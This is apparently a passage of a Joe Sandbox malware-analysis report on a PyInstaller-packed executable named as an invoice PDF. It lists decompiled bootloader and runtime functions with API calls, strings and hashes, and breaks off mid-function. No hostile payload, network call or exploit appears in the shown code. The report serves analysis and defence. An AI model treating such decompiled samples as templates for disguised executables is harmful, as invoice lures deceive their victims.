                            • Opcode Fuzzy Hash: b81a37e67431225dd98d6ca9d53a1e8bb5b8654fc1c2fdacfad407d031e99ac9
                            • Instruction Fuzzy Hash: 5A2184B6A043056BD704AA799C02A8FBF95AF9425CF444439FE48D2215F375D218C7D3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314860, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 46windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 63%
                            			E01314860(void* __edx, signed int _a8192, long _a8200) {
				short _v0;
				signed int _t8;
				long _t10;
				long _t11;
				void* _t24;
				signed int _t26;

				_t24 = __edx;
				E01317880();
				_t8 =  *0x133c008; // 0xa212446c
				_a8192 = _t8 ^ _t26;
				_t10 = _a8200;
				if(_t10 == 0) {
					_t10 = GetLastError();
				}
				_t11 = FormatMessageW(0x1000, 0, _t10, 0x400,  &_v0, 0x1000, 0); // executed
				_t32 = _t11;
				if(_t11 != 0) {
					__eflags = E01314C90("An attempt to set the process default activation context failed because the process default activation context was already set.",  &_v0, 0x1000);
					_t19 =  !=  ? 0x1344a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
					_t14 =  !=  ? 0x1344a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
					__eflags = _a8192 ^ _t26 + 0x0000000c;
					E0131786A();
					return  !=  ? 0x1344a58 : "PyInstaller: pyi_win32_utils_to_utf8 failed.";
				} else {
					_push("No error messages generated.\n");
					_push("FormatMessageW");
					E01311860(_t24, _t32);
					E0131786A();
					return "PyInstaller: FormatMessageW failed.";
				}
			}









                            0x01314860
                            0x01314865
                            0x0131486a
                            0x01314871
                            0x01314878
                            0x01314881
                            0x01314883
                            0x01314883
                            0x013148a2
                            0x013148a8
                            0x013148aa
                            0x013148f4
                            0x013148fb
                            0x013148fe
                            0x01314907
                            0x01314909
                            0x01314914
                            0x013148ac
                            0x013148ac
                            0x013148b1
                            0x013148b6
                            0x013148cc
                            0x013148d7
                            0x013148d7

                            APIs
                            • GetLastError.KERNEL32(013118B9,00000000,?,?,?,00000400,?,00000000,?), ref: 01314883
                              • Part of subcall function 01314C90: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,013148EC,An attempt to set the process default activation context failed because the process default activation context was already set.,?,00001000,?,?), ref: 01314CAA
                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000400,00000000,00001000,00000000,013118B9,00000000,?,?,?,00000400,?,00000000,?), ref: 013148A2
                            Strings
                            • PyInstaller: pyi_win32_utils_to_utf8 failed., xrefs: 013148EF
                            • An attempt to set the process default activation context failed because the process default activation context was already set., xrefs: 013148E2, 013148F6
                            • FormatMessageW, xrefs: 013148B1
                            • No error messages generated., xrefs: 013148AC
                            • PyInstaller: FormatMessageW failed., xrefs: 013148BE
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharErrorFormatLastMessageMultiWide
                            • String ID: An attempt to set the process default activation context failed because the process default activation context was already set.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.
                            • API String ID: 1653872744-3426200897
                            • Opcode ID: c22856d40d3d283ae64f8b2507bcc98d23c11c7f82f275e0a25b67d6a0d4c6e3
                            • Instruction ID: 731526bd93bf7908a7a6fbf15fd914cfeb9636359533e92ef0d41f7023bf71ce
                            • Opcode Fuzzy Hash: c22856d40d3d283ae64f8b2507bcc98d23c11c7f82f275e0a25b67d6a0d4c6e3
                            • Instruction Fuzzy Hash: 3801F7717403416BF72C97199C8BBAA77D5EF98B4DF44442CBA4DC9285F6609804C35F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131CBFB, Relevance: 6.2, APIs: 4, Instructions: 172pipeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 581 131cbfb-131cc33 GetFileType 582 131cc39-131cc44 581->582 583 131cd2e-131cd31 581->583 586 131cc66-131cc81 call 13238bb 582->586 587 131cc46-131cc57 call 131cf93 582->587 584 131cd33-131cd36 583->584 585 131cd5a-131cd82 583->585 584->585 588 131cd38-131cd3a 584->588 590 131cd84-131cd97 PeekNamedPipe 585->590 591 131cd9f-131cda1 585->591 593 131cd4b-131cd58 GetLastError call 131c998 586->593 600 131cc87-131ccb2 call 131cf2d call 131cdb3 586->600 603 131cd47-131cd49 587->603 604 131cc5d-131cc64 587->604 588->593 594 131cd3c-131cd41 call 131c9ce 588->594 590->591 596 131cd99-131cd9c 590->596 597 131cda2-131cdb2 call 131786a 591->597 593->603 594->603 596->591 600->603 612 131ccb8-131ccd5 call 131cdb3 600->612 603->597 604->586 612->603 615 131ccd7-131cce3 call 131cdb3 612->615 617 131cce8-131ccf6 615->617 617->603 618 131ccf8-131cd16 call 13238bb 617->618 618->593 621 131cd18-131cd2c call 131cefb 618->621 621->597
                            C-Code - Quality: 100%
                            			E0131CBFB(signed int __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr* _a16) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void _v48;
				char _v64;
				void _v72;
				long _v76;
				intOrPtr _v80;
				char _v84;
				void* __ebx;
				signed int _t53;
				signed int _t56;
				intOrPtr _t66;
				signed int _t68;
				int _t70;
				signed int _t81;
				signed int _t83;
				signed int _t85;
				intOrPtr _t98;
				signed int _t104;
				signed int _t109;
				signed int _t111;
				signed int _t118;
				void* _t121;
				intOrPtr* _t128;
				signed int _t130;
				intOrPtr _t140;

				_t118 = __edx;
				_t53 =  *0x133c008; // 0xa212446c
				_v8 = _t53 ^ _t130;
				_t128 = _a16;
				_t121 = _a12;
				_v80 = _a4;
				_v76 = _t121;
				_t56 = GetFileType(_t121); // executed
				_t104 = _t56 & 0xffff7fff;
				if(_t104 != 1) {
					__eflags = _t104 - 2;
					if(_t104 == 2) {
						L16:
						__eflags = _t104 - 2;
						 *((short*)(_t128 + 6)) = ((0 | _t104 != 0x00000002) - 0x00000001 & 0x00001000) + 0x1000;
						 *((short*)(_t128 + 8)) = 1;
						_t66 = _a8;
						 *((intOrPtr*)(_t128 + 0x10)) = _t66;
						 *_t128 = _t66;
						__eflags = _t104 - 2;
						if(_t104 != 2) {
							_t70 = PeekNamedPipe(_t121, 0, 0, 0,  &_v76, 0);
							__eflags = _t70;
							if(_t70 != 0) {
								 *((intOrPtr*)(_t128 + 0x14)) = _v76;
							}
						}
						_t68 = 1;
						__eflags = 1;
						L20:
						E0131786A();
						return _t68;
					}
					__eflags = _t104 - 3;
					if(_t104 == 3) {
						goto L16;
					}
					__eflags = _t104;
					if(_t104 != 0) {
						L15:
						E0131C998(GetLastError());
						L14:
						_t68 = 0;
						goto L20;
					}
					 *((intOrPtr*)(E0131C9CE())) = 9;
					goto L14;
				}
				 *((short*)(_t128 + 8)) = 1;
				_t74 = _v80;
				if(_v80 == 0) {
					L4:
					_t109 = 0xa;
					memset( &_v48, 0, _t109 << 2);
					if(E013238BB(0, _t140, _v76, 0,  &_v48, 0x28) == 0) {
						goto L15;
					}
					 *((short*)(_t128 + 6)) = E0131CF2D(0, _v16, _v80);
					_t81 = E0131CDB3(_v32, _v28, 0, 0); // executed
					 *(_t128 + 0x20) = _t81;
					 *(_t128 + 0x24) = _t118;
					if((_t81 & _t118) == 0xffffffff) {
						goto L14;
					}
					_t24 = _t128 + 0x20; // 0x83cc758d
					_t83 = E0131CDB3(_v40, _v36,  *_t24, _t118); // executed
					 *(_t128 + 0x18) = _t83;
					 *(_t128 + 0x1c) = _t118;
					if((_t83 & _t118) == 0xffffffff) {
						goto L14;
					}
					_t29 = _t128 + 0x24; // 0xcb830cc4
					_t30 = _t128 + 0x20; // 0x83cc758d
					_t85 = E0131CDB3(_v48, _v44,  *_t30,  *_t29); // executed
					 *(_t128 + 0x28) = _t85;
					 *(_t128 + 0x2c) = _t118;
					_t144 = (_t85 & _t118) - 0xffffffff;
					if((_t85 & _t118) == 0xffffffff) {
						goto L14;
					}
					_t111 = 6;
					memset( &_v72, 0, _t111 << 2);
					if(E013238BB(0, _t144, _v76, 1,  &_v72, 0x18) == 0) {
						goto L15;
					}
					_t39 = _t128 + 0x14; // 0x131cb3d
					_t68 = E0131CEFB( &_v64, _t39) & 0xffffff00 | _t95 != 0x00000000;
					goto L20;
				}
				_v84 = 0;
				if(E0131CF93(_t74,  &_v84) == 0) {
					goto L14;
				}
				_t98 = _v84 - 1;
				_t140 = _t98;
				 *((intOrPtr*)(_t128 + 0x10)) = _t98;
				 *_t128 = _t98;
				goto L4;
			}


































                            0x0131cbfb
                            0x0131cc03
                            0x0131cc0a
                            0x0131cc12
                            0x0131cc16
                            0x0131cc1a
                            0x0131cc1d
                            0x0131cc20
                            0x0131cc2a
                            0x0131cc33
                            0x0131cd2e
                            0x0131cd31
                            0x0131cd5a
                            0x0131cd61
                            0x0131cd6c
                            0x0131cd73
                            0x0131cd77
                            0x0131cd7a
                            0x0131cd7d
                            0x0131cd7f
                            0x0131cd82
                            0x0131cd8f
                            0x0131cd95
                            0x0131cd97
                            0x0131cd9c
                            0x0131cd9c
                            0x0131cd97
                            0x0131cda1
                            0x0131cda1
                            0x0131cda2
                            0x0131cdaa
                            0x0131cdb2
                            0x0131cdb2
                            0x0131cd33
                            0x0131cd36
                            0x00000000
                            0x00000000
                            0x0131cd38
                            0x0131cd3a
                            0x0131cd4b
                            0x0131cd52
                            0x0131cd47
                            0x0131cd47
                            0x00000000
                            0x0131cd47
                            0x0131cd41
                            0x00000000
                            0x0131cd41
                            0x0131cc39
                            0x0131cc3f
                            0x0131cc44
                            0x0131cc66
                            0x0131cc68
                            0x0131cc70
                            0x0131cc81
                            0x00000000
                            0x00000000
                            0x0131cc98
                            0x0131cc9f
                            0x0131cca4
                            0x0131ccac
                            0x0131ccb2
                            0x00000000
                            0x00000000
                            0x0131ccb9
                            0x0131ccc2
                            0x0131ccc7
                            0x0131cccf
                            0x0131ccd5
                            0x00000000
                            0x00000000
                            0x0131ccd7
                            0x0131ccda
                            0x0131cce3
                            0x0131cce8
                            0x0131ccf0
                            0x0131ccf3
                            0x0131ccf6
                            0x00000000
                            0x00000000
                            0x0131ccfa
                            0x0131cd00
                            0x0131cd16
                            0x00000000
                            0x00000000
                            0x0131cd18
                            0x0131cd29
                            0x00000000
                            0x0131cd29
                            0x0131cc49
                            0x0131cc57
                            0x00000000
                            0x00000000
                            0x0131cc60
                            0x0131cc60
                            0x0131cc61
                            0x0131cc64
                            0x00000000

                            APIs
                            • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 0131CC20
                              • Part of subcall function 0131CF93: __dosmaperr.LIBCMT ref: 0131CFD6
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0131CB29), ref: 0131CD4B
                            • __dosmaperr.LIBCMT ref: 0131CD52
                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0131CD8F
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __dosmaperr$ErrorFileLastNamedPeekPipeType
                            • String ID:
                            • API String ID: 3955570002-0
                            • Opcode ID: b1e85e53eaef1843b88b1cf9f4abfb7c4a8f6612d3221f72649e1497fba402f6
                            • Instruction ID: 46df20321cc6f39d98b75af13b7c7b74b6df8965eeb132ea2d0f005ff73c70d5
                            • Opcode Fuzzy Hash: b1e85e53eaef1843b88b1cf9f4abfb7c4a8f6612d3221f72649e1497fba402f6
                            • Instruction Fuzzy Hash: 5B51EF72940609AFDB28DFB8CC40AFEBBF9EF08314B149929E556D66A0E7309945CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01311120, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 624 1311120-1311153 call 1319f16 call 1319b2b 629 13111f2-13111f7 624->629 630 1311159-131115c 624->630 630->629 631 1311162-1311189 call 1319f16 call 1319b2b call 1319f16 630->631 637 131118e-13111a8 call 1319b2b 631->637 637->629 640 13111aa-13111ad 637->640 641 13111b6-13111b9 640->641 642 13111af-13111b4 640->642 641->629 644 13111bb 641->644 643 13111c0-13111f1 call 1319f16 call 1319b2b 642->643 644->643
                            C-Code - Quality: 100%
                            			E01311120(void* __edx, void* _a4) {
				char _v4;
				signed int _t15;
				intOrPtr _t30;
				signed int _t32;

				_t34 = __edx;
				_t35 = _a4;
				_v4 = 0;
				E01319F16(__edx,  *_a4, 0, 0); // executed
				E01319B2B( &_a4, 1, 2,  *_a4); // executed
				_t15 = _a4;
				if(_t15 != 0x4d || _t15 != 0x5a) {
					L8:
					return _t15 | 0xffffffff;
				} else {
					E01319F16(__edx,  *_t35, 0x3c, 0); // executed
					E01319B2B( &_v4, 4, 1,  *_t35);
					E01319F16(__edx,  *_t35, _v4 + 0x18, 0); // executed
					E01319B2B( &_a4, 2, 1,  *_t35);
					_t15 = _a4;
					if(_t15 != 0xb) {
						goto L8;
					} else {
						if(_t15 != 1) {
							if(_t15 != 2) {
								goto L8;
							} else {
								_t32 = 0xa8;
								goto L7;
							}
						} else {
							_t32 = 0x98;
							L7:
							E01319F16(_t34,  *_t35, _v4 + _t32, 0);
							E01319B2B( &_v4, 4, 1,  *_t35);
							_t30 = _v4;
							_t31 =  ==  ? _t32 | 0xffffffff : _t30;
							return  ==  ? _t32 | 0xffffffff : _t30;
						}
					}
				}
			}







                            0x01311120
                            0x01311122
                            0x0131112a
                            0x01311134
                            0x01311144
                            0x01311149
                            0x01311153
                            0x013111f2
                            0x013111f7
                            0x01311162
                            0x01311168
                            0x01311178
                            0x01311189
                            0x01311199
                            0x0131119e
                            0x013111a8
                            0x00000000
                            0x013111aa
                            0x013111ad
                            0x013111b9
                            0x00000000
                            0x013111bb
                            0x013111bb
                            0x00000000
                            0x013111bb
                            0x013111af
                            0x013111af
                            0x013111c0
                            0x013111cb
                            0x013111db
                            0x013111e0
                            0x013111ec
                            0x013111f1
                            0x013111f1
                            0x013111ad
                            0x013111a8

                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __fread_nolock
                            • String ID:
                            • API String ID: 2638373210-0
                            • Opcode ID: ce98422da571ea914d066f3442d10b5b37358b873f4f021f930ab9fa887209a3
                            • Instruction ID: 927cdc730b5f5fe74c634d5fdd7f43d72af10de816f2be815dc7d3c837cf70cc
                            • Opcode Fuzzy Hash: ce98422da571ea914d066f3442d10b5b37358b873f4f021f930ab9fa887209a3
                            • Instruction Fuzzy Hash: 49210571644302BAEE346F2CCC42F96B399EF4471CF50492DF3D0AA1DAD6B2D8458B46
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131CDB3, Relevance: 6.1, APIs: 4, Instructions: 65timeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 649 131cdb3-131cdc9 650 131cdd9-131cde9 FileTimeToSystemTime 649->650 651 131cdcb-131cdcf 649->651 653 131cdeb-131cdfd SystemTimeToTzSpecificLocalTime 650->653 654 131ce3d-131ce49 GetLastError call 131c998 650->654 651->650 652 131cdd1-131cdd7 651->652 656 131ce4f-131ce5c call 131786a 652->656 653->654 657 131cdff-131ce1f call 131ce5d 653->657 661 131ce4a-131ce4d 654->661 663 131ce24-131ce2e 657->663 661->656 663->656 664 131ce30-131ce3b call 131c9ce 663->664 664->661
                            C-Code - Quality: 100%
                            			E0131CDB3(struct _FILETIME _a4, intOrPtr _a8, signed int _a12, void* _a16) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				struct _SYSTEMTIME _v40;
				signed int _v44;
				signed int _t20;
				signed int _t26;
				signed int _t27;
				int _t30;
				signed int _t43;
				signed int _t46;

				_t20 =  *0x133c008; // 0xa212446c
				_v8 = _t20 ^ _t46;
				if(_a4.dwLowDateTime != 0 || _a8 != 0) {
					if(FileTimeToSystemTime( &_a4,  &_v40) == 0) {
						L7:
						_t26 = E0131C998(GetLastError());
						goto L8;
					} else {
						_t30 = SystemTimeToTzSpecificLocalTime(0,  &_v40,  &_v24); // executed
						if(_t30 == 0) {
							goto L7;
						} else {
							_v44 = _v44 | 0xffffffff;
							_t27 = E0131CE5D( &_v24,  &(_v24.wMonth),  &(_v24.wDay),  &(_v24.wHour),  &(_v24.wMinute),  &(_v24.wSecond),  &_v44); // executed
							if((_t27 & _t43) == 0xffffffff) {
								_t26 = E0131C9CE();
								 *_t26 = 0x84;
								L8:
								_t27 = _t26 | 0xffffffff;
							}
						}
					}
				} else {
					_t27 = _a12;
				}
				E0131786A();
				return _t27;
			}













                            0x0131cdbb
                            0x0131cdc2
                            0x0131cdc9
                            0x0131cde9
                            0x0131ce3d
                            0x0131ce44
                            0x00000000
                            0x0131cdeb
                            0x0131cdf5
                            0x0131cdfd
                            0x00000000
                            0x0131cdff
                            0x0131cdff
                            0x0131ce1f
                            0x0131ce2e
                            0x0131ce30
                            0x0131ce35
                            0x0131ce4a
                            0x0131ce4a
                            0x0131ce4d
                            0x0131ce2e
                            0x0131cdfd
                            0x0131cdd1
                            0x0131cdd1
                            0x0131cdd4
                            0x0131ce54
                            0x0131ce5c

                            APIs
                            • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,00000000,00000000,000000FF,?,?,00000000), ref: 0131CDE1
                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0131CDF5
                            • GetLastError.KERNEL32 ref: 0131CE3D
                            • __dosmaperr.LIBCMT ref: 0131CE44
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Time$System$ErrorFileLastLocalSpecific__dosmaperr
                            • String ID:
                            • API String ID: 593088924-0
                            • Opcode ID: 511e000e6fbd5f157d91cd7f22f46a7e415887e7b6224e67bb69092562aa3f6b
                            • Instruction ID: e724454b2b17529ab85fe9cd1449cf305dec49364d4b75a11f38b9fb4f15c06e
                            • Opcode Fuzzy Hash: 511e000e6fbd5f157d91cd7f22f46a7e415887e7b6224e67bb69092562aa3f6b
                            • Instruction Fuzzy Hash: DE21607294010DABCB18DFE4C944AEEBBBCAF08325F106256E516D6084EB34D744CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131FD60, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 667 131fd60-131fd6b 668 131fd72-131fd76 667->668 669 131fd6d-131fd71 667->669 670 131fdc9-131fdcb 668->670 671 131fd78-131fd8c WideCharToMultiByte 670->671 672 131fdcd 670->672 674 131fdda-131fddd 671->674 675 131fd8e-131fd91 call 1320b10 671->675 673 131fdcf-131fdd2 672->673 674->673 677 131fd96-131fd9c 675->677 678 131fdd3-131fdd9 call 13209eb 677->678 679 131fd9e-131fdb4 WideCharToMultiByte 677->679 678->674 679->678 681 131fdb6-131fdc6 call 1326882 call 13209eb 679->681 681->670
                            C-Code - Quality: 83%
                            			E0131FD60(signed int __eax, void* __ecx, void* __edx) {
				signed int _t2;
				signed int _t3;
				char* _t4;
				int _t10;
				int _t11;
				void* _t13;
				void* _t16;
				short** _t17;
				char* _t20;
				void* _t21;

				_t16 = __edx;
				_t13 = __ecx;
				_t17 =  *0x13460c0; // 0xe44410
				if(_t17 != 0) {
					_t10 = 0;
					while( *_t17 != _t10) {
						_t2 = WideCharToMultiByte(_t10, _t10,  *_t17, 0xffffffff, _t10, _t10, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t4 = E01320B10(_t13, _t11, 1); // executed
							_t20 = _t4;
							_pop(_t13);
							if(_t20 == 0) {
								L10:
								_t2 = E013209EB(_t20);
								goto L11;
							} else {
								_t10 = 0;
								if(WideCharToMultiByte(0, 0,  *_t17, 0xffffffff, _t20, _t11, 0, 0) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t20);
									E01326882(_t16);
									E013209EB(0);
									_t21 = _t21 + 0xc;
									_t17 =  &(_t17[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}













                            0x0131fd60
                            0x0131fd60
                            0x0131fd63
                            0x0131fd6b
                            0x0131fd74
                            0x0131fdc9
                            0x0131fd82
                            0x0131fd88
                            0x0131fd8c
                            0x0131fdda
                            0x0131fdda
                            0x0131fd8e
                            0x0131fd91
                            0x0131fd96
                            0x0131fd99
                            0x0131fd9c
                            0x0131fdd3
                            0x0131fdd4
                            0x00000000
                            0x0131fd9e
                            0x0131fda8
                            0x0131fdb4
                            0x00000000
                            0x0131fdb6
                            0x0131fdb6
                            0x0131fdb7
                            0x0131fdb8
                            0x0131fdbe
                            0x0131fdc3
                            0x0131fdc6
                            0x00000000
                            0x0131fdc6
                            0x0131fdb4
                            0x0131fd9c
                            0x0131fdcf
                            0x0131fdd2
                            0x00000000
                            0x0131fdd2
                            0x0131fdcd
                            0x00000000
                            0x0131fd6d
                            0x0131fd71
                            0x0131fd71
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9274f6e52212be0b80aa434d9d61f21edb0d65ca14ef6ba97f41bbc0bd1d8b8f
                            • Instruction ID: 687964b47140dbb8d0ad98b8a684c8998c20f3c25440ae0a7b990c3e9fbdf379
                            • Opcode Fuzzy Hash: 9274f6e52212be0b80aa434d9d61f21edb0d65ca14ef6ba97f41bbc0bd1d8b8f
                            • Instruction Fuzzy Hash: A8014FB220962A7EF629297C6CC1F7B665DDF517BCF600326F632551DDDA608D0841A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131FAB9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 687 131fab9-131fac0 688 131fac2-131fac4 687->688 689 131fac5-131fad5 call 1327978 call 1327c60 687->689 694 131fad7-131fada 689->694 695 131fadc-131fadd call 131fb66 689->695 696 131fb06-131fb11 call 13209eb 694->696 698 131fae2-131fae5 695->698 700 131fae7-131faea 698->700 701 131faec-131fafc call 131fece 698->701 703 131fafe-131fb05 call 13209eb 700->703 701->703 703->696
                            C-Code - Quality: 92%
                            			E0131FAB9(void* __ebx, void* __ecx) {
				intOrPtr _t3;
				signed int _t15;
				signed int _t16;

				if( *0x13460bc == 0) {
					_push(_t15);
					E01327978(__ecx);
					_t19 = E01327C60();
					if(_t2 != 0) {
						_t3 = E0131FB66(__ebx, _t19); // executed
						if(_t3 != 0) {
							 *0x13460c8 = _t3;
							E0131FECE(0x13460bc, _t3);
							_t16 = 0;
						} else {
							_t16 = _t15 | 0xffffffff;
						}
						E013209EB(0);
					} else {
						_t16 = _t15 | 0xffffffff;
					}
					E013209EB(_t19);
					return _t16;
				} else {
					return 0;
				}
			}






                            0x0131fac0
                            0x0131fac6
                            0x0131fac7
                            0x0131fad1
                            0x0131fad5
                            0x0131fadd
                            0x0131fae5
                            0x0131faf2
                            0x0131faf7
                            0x0131fafc
                            0x0131fae7
                            0x0131fae7
                            0x0131fae7
                            0x0131fb00
                            0x0131fad7
                            0x0131fad7
                            0x0131fad7
                            0x0131fb07
                            0x0131fb11
                            0x0131fac2
                            0x0131fac4
                            0x0131fac4

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free
                            • String ID: Y
                            • API String ID: 269201875-3319100138
                            • Opcode ID: 48e1b3ff3ef00719039f149d60c6fd6cc5a1a54b157ffb0d0bcf98a6b7ab8b21
                            • Instruction ID: 4862498e8f1ecc76b1e7fd4ef5752a9bcd8a924b25e486fdefe13f0ea981205e
                            • Opcode Fuzzy Hash: 48e1b3ff3ef00719039f149d60c6fd6cc5a1a54b157ffb0d0bcf98a6b7ab8b21
                            • Instruction Fuzzy Hash: 8CE0E5B3A0952252F67D363E6C01B6F159EABD2B3DF10021AF124C62C8CE24484E85A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131FB66, Relevance: 4.6, APIs: 3, Instructions: 102COMMON
                            Download Yara Rule
                            C-Code - Quality: 80%
                            			E0131FB66(void* __ebx, char* _a4) {
				signed short* _v0;
				intOrPtr* _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed short* _v40;
				intOrPtr _v56;
				intOrPtr* _v84;
				void* __ecx;
				char _t32;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr _t40;
				void* _t42;
				signed int _t46;
				signed short _t51;
				signed int _t52;
				void* _t55;
				void* _t57;
				intOrPtr _t58;
				intOrPtr* _t60;
				signed short _t63;
				intOrPtr* _t64;
				void* _t68;
				intOrPtr* _t69;
				signed short* _t71;
				void* _t73;
				intOrPtr* _t75;
				intOrPtr* _t79;
				signed short* _t88;
				signed int _t90;
				void* _t91;
				signed short* _t99;
				intOrPtr _t102;
				void* _t103;
				intOrPtr _t104;
				signed short* _t105;
				char* _t107;
				intOrPtr _t109;
				intOrPtr* _t111;
				signed short* _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				signed short* _t119;
				intOrPtr _t120;
